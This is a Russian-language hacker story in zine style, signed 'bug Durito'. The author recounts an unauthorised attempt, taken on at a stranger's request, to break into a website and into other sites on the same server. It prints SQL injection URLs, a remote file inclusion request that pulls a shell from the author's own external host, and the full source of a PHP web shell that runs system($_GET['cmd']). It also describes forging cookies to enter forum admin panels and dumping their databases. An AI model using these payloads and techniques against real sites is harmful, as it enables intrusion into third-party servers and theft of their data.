|
Привет,
ты навеное думаешь что это какая-то опечатка или прикол.
Совсем нет. Обычно хакеры пишут статьи с заголовками ""Как
был взломан ..."
В этой статье речь пойдет тоже о хакинге, но без традиционного
happy end. Хотя как знать...
Как-то
на днях мне в асю стучит чел с предложением добыть ему доступ
к одному ресурсу.
Делать мне было особо нечего и я согласился. Просмотрев
данный им урл, я увидел немного интересной инфы:
http://www.russianspain.com/phpinfo.php
и соответсвенно:
http://www.russianspain.com/php.ini
Полазив
по сайту, я нашел еще возможность выполнения sql-инъекции,
но сообщения об ошибке не выводились, и я решил оставить
это на потом.
Пробив ip сайта, я увидел что на нем числилось еще 400 с
лишним сайтов. Я методично решил их перебирать, пока не
найду бажный.
Несколько раз мне попадались форумы phpBB второй ветки,
но sql-инъекция резалась во всех. Подменив куки я получил
доступ к админкам, и сбекапил базы в надежде что один из
паролей подойдет и к фтп.
Один раз попался Advanced Guestbook 2.2, инъкция для доступа
к админке работала, но для доступа и редактирования template
требовалось еще валидный параметр session, поэтому меня
постоянно выбрасыло на страницу авторизации.
Было еще несколько сайтов с возможностью sql-инъекции, типа:
http://www.joehenke.com/gallery_view.php?galleryid=16+UNION+SELECT+1/*
но вытянуть из них что-то путное мне сразу не удалось.
Так
длилось до того момента, пока я не набрел на up-glass.com,
сайт компании "Унипак", производящей тару для
алкогольной промышленности России.
Увидев что файлы инклудятся, я попытался подключить свой
шелл на narod.ru:
http://up-glass.com/former.php?folder=http://durito.narod.ru/sh&cmd=ls
Сервер
выдал сообщение об ошибке:
Warning: lmenu(): php_network_getaddresses: getaddrinfo
failed: Temporary failure in name resolution in /home/upglass/public_html/func.php
on line 40
Warning:
lmenu(http://durito.narod.ru/sh/config.p): failed to open
stream: Success in /home/upglass/public_html/func.php on
line 40
Все
стало сразу ясно, я быстро залил на свой сайт файл config.p
вот с таким содержимым:
<?
echo "<DIV align=left><PRE>";
system($_GET['cmd']);
echo "</PRE></DIV>";
?>
и
следующий запрос:
http://up-glass.com/former.php?folder=http://durito.narod.ru/&cmd=ls
уже выдал мне список файлов сайта
Но
просматривать директории других юзеров я не мог, даже public_html
был мне не доступен.
Ядро
было свежим:
Linux cpanel05.gzo.com 2.6.11.11 #1 SMP Tue May 31 14:02:19
CDT 2005 i686 i686 i386 GNU/Linux
о руте можно было бы забыть.
Тогда
я решил вернуться к sql-инъекции на www.russianspain.com.
И только сейчас случайно бросил взляд на контент сайта.
Я увидел, что взляды создателей сайта относительно президента
РФ и его политики очень близки моим. Прочитав статьи я твердо
решил оставить один из последних свободных голосов оппозиции
в покое.
Мало того, я отписал им о уязвимостях на сайте, и попросил
вывесить баннер "Хватит Путина!".
Вот
такая история.
Твой
bug Durito.
_________________
EAT THE RICH!
|
|